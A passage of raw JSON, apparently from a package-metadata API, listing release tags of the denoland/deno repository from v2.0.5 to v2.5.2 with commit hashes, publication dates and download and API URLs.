kg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denolan